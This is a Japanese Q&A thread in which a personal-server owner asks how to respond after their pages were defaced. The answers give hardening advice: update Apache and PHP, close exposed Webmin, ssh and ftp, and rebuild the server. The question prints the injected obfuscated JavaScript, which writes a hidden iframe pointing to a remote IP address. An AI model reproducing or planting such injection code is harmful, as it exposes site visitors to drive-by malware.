人力検索はてな
モバイル版を表示しています。PC版はこちら
i-mobile

以前にも同じ質問が出ていたようなのですが、HTMLが勝手に改ざんされているようです。
下のコードがBODYのすぐ下にはさまっており、どうやらウイルス系のもののようですが、個人サーバですので、どこを対策すれば
いいでしょうか?
改ざんされた日はPCを起動していませんでしたので、サーバの問題だと思っています。


挟まれていたコード:
src='http://url' width='1' height='1' style='visibility: hidden;'> v4765ee14a9c7c(v4765ee14aa163){ var v4765ee14aa47a=16; return(parseInt(v4765ee14aa163,v4765ee14aa47a));}function ・・・・・・・・・v4765ee14aac6f(v4765ee14ab068){ var v4765ee14abc60=2; var v4765ee14ab464='';for(v4765ee14ab861=0; v4765ee14ab861<v4765ee14ab068.length; v4765ee14ab861+=v4765ee14abc60){ v4765ee14ab464+=(String.fromCharCode(v4765ee14a9c7c(v4765ee14ab068.substr(v4765ee14ab861, v4765ee14abc60))));}return v4765ee14ab464;} document.write(v4765ee14aac6f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D66303039376236207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313634333736292B2737366433325C272077696474683D373631206865696768743D323136207374796C653D5C27・・・・・・・5C273E3C2F696672616D653E27293C2F5343524950543E'));</script>


同様の質問:
http://q.hatena.ne.jp/1198485316

●質問者: chirubo
●カテゴリ:コンピュータ インターネット
✍キーワード:BODY HTML pc SRC ウイルス
○ 状態 :終了
└ 回答数 : 5/5件

▽最新の回答へ

1 ● pahoo
●15ポイント

サーバOS,HTTPサーバの種類/バージョンの情報をお知らせ下さい。

ルータやファイアウォールの設定値もお聞きしたいところですが、公開の場に晒すべき情報ではないので、これらは不問とします。


最近、不正な攻撃によるサイトの書き換えが増えています。

一般論としては、IPAの「ウェブサイト運営者のための脆弱性対応ガイド」を参考にして下さい。

◎質問者からの返答

そうでした。忘れていました。

CEBTOS5(2.6.18-53.1.14.el5.centos.plus)

apache:2.2.3-11

php-5.1.6-15

すべてyumからインストールしています。

firewallに関してはsetupコマンドから、

ssh、http、https、ftp、webmin、53を解放しています。

サーバにmysqlは設置していますが、改ざんされたサイトでは利用していません。


2 ● itss
●15ポイント

Hi,

>つかっているサーバー会社はXREAです。

どのプランを使ってるんでしょうか?

XREAは広告を入れるために勝手にHTMLにコードを埋め込みますよ。

◎質問者からの返答

サーバは個人サーバです。

http://q.hatena.ne.jp/1198485316

の内容とはサーバが違います。


3 ● pahoo
●28ポイント

応急手当に過ぎませんが、まずは下記の対策が必要だと思います。


Apache, PHP とも、かなり古いバージョンですね。最新バージョンにアップデートして下さい。


「個人サーバ」ということは、ご自宅にサーバがあるのですよね。

Webmin, ssh, ftpはインターネットに対して公開しないようにしてください。


どうしてもWebminをインターネットに公開する必要がある場合は、セキュリティ面での細心の注意が必要です。最低限の対策として――

  1. Webminがあるディレクトリに対してBasic認証をかける(.htaccess, .htpasswd でアクセス制限する)。
  2. Webmin通信に対してはSSLをかける。https通信ができるようですので、これはすぐに対応できると思います。

port53については、ご契約のDNSサーバ以外からのアクセスはブロックして下さい。プライマリ、セカンダリなど複数あれば複数設定のこと。これらのDNSサーバ以外から来る port53 通信はアタック攻撃だからです。

◎質問者からの返答

ありがとうございます。

個人でのサーバですが、諸事情でFTPなどは解放をしないといけませんので、バージョンアップをしていきます。

yumでapache、phpなどをインストールしているのですが、そのままyum updateしても、最新版には更新できないので、

最新版にする方法などありませんでしょうか?


4 ● pahoo
●28ポイント

そのままyum updateしても、最新版には更新できないので

公開サーバであれば、ApacheにしてもPHPにしても、yumを使わずに個別にインストール/アップデートした方が良いですよ。

◎質問者からの返答

そうですか。

もしyumで更新しようと思えば自分でリポジトリを作らないとだめそうですね。

できればyumを使っていきたいと思っています。


5 ● itss
●14ポイント

Hi,

データ以外はすべて破棄。

データもウイルスチェックする。

環境はすべて破棄して1から作り直し。

原因がわからないなら、そうするしか助かる道はありません。

◎質問者からの返答

わかりました。

他にも複数の方が被害にあわれているので、何か方法がないかなと思いました。

関連質問


●質問をもっと探す●



0.人力検索はてなトップ
8.このページを友達に紹介
9.このページの先頭へ
対応機種一覧
お問い合わせ
ヘルプ/お知らせ
ログイン
無料ユーザー登録
はてなトップ